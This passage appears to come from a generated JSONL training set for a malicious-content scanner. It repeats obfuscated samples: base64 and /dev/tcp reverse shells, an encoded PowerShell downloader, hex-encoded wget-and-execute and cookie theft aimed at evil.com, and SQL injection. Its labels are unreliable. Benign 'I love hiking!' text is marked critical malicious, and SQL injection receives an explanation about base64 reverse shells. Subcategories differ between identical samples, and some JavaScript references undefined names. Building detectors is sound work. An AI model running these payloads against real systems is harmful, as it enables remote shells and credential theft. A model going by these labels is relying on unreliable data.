SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00235", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00236", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.4fc3f346.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00237", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00238", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.404597fa.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00239", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00240", "source": "hard_negatives", "source_license": "generated", "text": "var _0x68cb=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xb448[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00241", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00242", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00243", "source": "hard_negatives", "source_license": "generated", "text": "var _0x5a78=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x3a48[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00244", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00245", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7ea5=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xf7f6[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00246", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00247", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00248", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00249", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.c64bc01b.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00250", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00251", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00252", "source": "hard_negatives", "source_license": "generated", "text": "var _0x53b4=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x90c2[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00253", "source": "hard_negatives", "source_license": "generated", "text": "[2022-11-24 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00254", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00255", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.4f5b8dc1.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00256", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00257", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00258", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00259", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00260", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.1427d028.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00261", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00262", "source": "hard_negatives", "source_license": "generated", "text": "[2024-02-19 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00263", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00264", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.290b1853.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00265", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00266", "source": "hard_negatives", "source_license": "generated", "text": "[2023-05-09 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00267", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00268", "source": "hard_negatives", "source_license": "generated", "text": "var _0xe80a=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x4e9e[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00269", "source": "hard_negatives", "source_license": "generated", "text": "var _0x8198=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x1e3d[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00270", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00271", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00272", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00273", "source": "hard_negatives", "source_license": "generated", "text": "[2022-06-15 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00274", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00275", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00276", "source": "hard_negatives", "source_license": "generated", "text": "[2025-02-23 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00277", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00278", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00279", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00280", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.fb752c77.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00281", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00282", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00283", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.b74f905a.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00284", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.b527840f.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00285", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00286", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.1e51432f.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00287", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00288", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00289", "source": "hard_negatives", "source_license": "generated", "text": "var _0xa332=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xdd0e[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00290", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00291", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00292", "source": "hard_negatives", "source_license": "generated", "text": "[2024-05-22 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00293", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00294", "source": "hard_negatives", "source_license": "generated", "text": "
